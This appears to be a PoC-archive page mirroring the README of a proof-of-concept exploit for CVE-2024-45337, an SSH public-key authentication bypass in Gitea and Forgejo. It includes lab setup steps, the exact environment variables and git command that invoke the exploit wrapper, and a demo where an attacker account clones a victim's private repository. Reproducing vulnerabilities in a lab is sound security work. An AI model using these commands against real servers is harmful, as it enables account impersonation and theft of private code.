关联漏洞
描述
Proof of Concept for CVE-2024-45337 against Gitea and Forgejo
介绍
Proof of Concept exploit for CVE-2024-45337
===
This repository contains a proof of concept exploit for [CVE-2024-45337](https://nvd.nist.gov/vuln/detail/CVE-2024-45337).
It can be used to wrap `ssh` when interacting with an SSH server which is implemented using `golang.org/x/crypto` <= v0.30.0. while caching permissions in the `ServerConfig.PublicKeyCallback` callback in an unsafe manner.
Gitea <= 1.22.4 and Forgejo <= 7.0.11, 9.0.2 are vulnerable when hosted using the internal SSH server. You can impersonate any user as long as you know any of the public keys they have associated with their account. You need to have an account yourself which you use for ssh authentication.
## Run the PoC
1. Start a vulnerable forgejo or gitea instance. Gitea Docker images aren't vulnerable, so you'll have to run using a native binary.
```shell
docker compose -f docker-compose.forgejo.yml up -d
```
2. Install while changing the SSH port to 22 on http://localhost:3000
3. Register a `victim` user
1. Add the victim's public key to the account on http://localhost:3000/user/settings/keys
2. Create a private repository called `important_repo` and generate an initial commit with a README so you have something to clone
4. Register an `attacker` user
1. Add the attacker's public key to the account on http://localhost:3000/user/settings/keys
5. Clone the repository using the attacker's account
1. Set `GIT_ATTACK_PRIVKEY` to path to private key of valid account
2. Set `GIT_ATTACK_PUBKEY` to path to known public key of other target account. We don't know the private key for that one.
3. Set `GIT_SSH` to path to exploit script to tell `git` to use this instead of the native `ssh` command
```shell
GIT_ATTACK_PRIVKEY=./id_ed25519_attacker GIT_ATTACK_PUBKEY=./id_ed25519_victim.pub GIT_SSH_VARIANT=ssh GIT_SSH=./ssh_cve-2024-45337.py git clone ssh://git@localhost:222/victim/important_repo.git
```
## Demo
Use `.ssh/config` to specify keys during cloning
```
Host sshvictim
Hostname localhost
Port 222
User git
IdentityFile /path/to/id_ed25519_victim
IdentitiesOnly yes
Host sshattacker
Hostname localhost
Port 222
User git
IdentityFile /path/to/id_ed25519_attacker
IdentitiesOnly yes
```
Run against local Forgejo 7.0.11 container setup like above.
```
$ ssh-keygen -t ed25519 -f id_ed25519_victim
$ ssh-keygen -t ed25519 -f id_ed25519_attacker
$ git clone sshattacker:victim/important_repo.git
Cloning into 'important_repo'...
Forgejo: User: 2:attacker with Key: 2:attacker is not authorized to read victim/important_repo.
fatal: Could not read from remote repository.
Please make sure you have the correct access rights
and the repository exists.
$ git clone sshvictim:victim/important_repo.git
Cloning into 'important_repo'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.
# Delete private key of victim for demo purposes
$ rm -rf important_repo id_ed25519_victim
$ GIT_ATTACK_PRIVKEY=./id_ed25519_attacker GIT_ATTACK_PUBKEY=./id_ed25519_victim.pub GIT_SSH_VARIANT=ssh GIT_SSH=./ssh_cve-2024-45337.py git clone ssh://git@localhost:222/victim/important_repo.git
Cloning into 'important_repo'...
remote: Enumerating objects: 3, done.
remote: Counting objects: 100% (3/3), done.
remote: Total 3 (delta 0), reused 0 (delta 0), pack-reused 0
Receiving objects: 100% (3/3), done.
```
文件快照
[4.0K] /data/pocs/cea1d6618a64a2448634c85ddf812e928de34e30
├── [ 463] docker-compose.forgejo.yml
├── [3.4K] README.md
├── [ 16] requirements.txt
└── [6.1K] ssh_cve-2024-45337.py
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。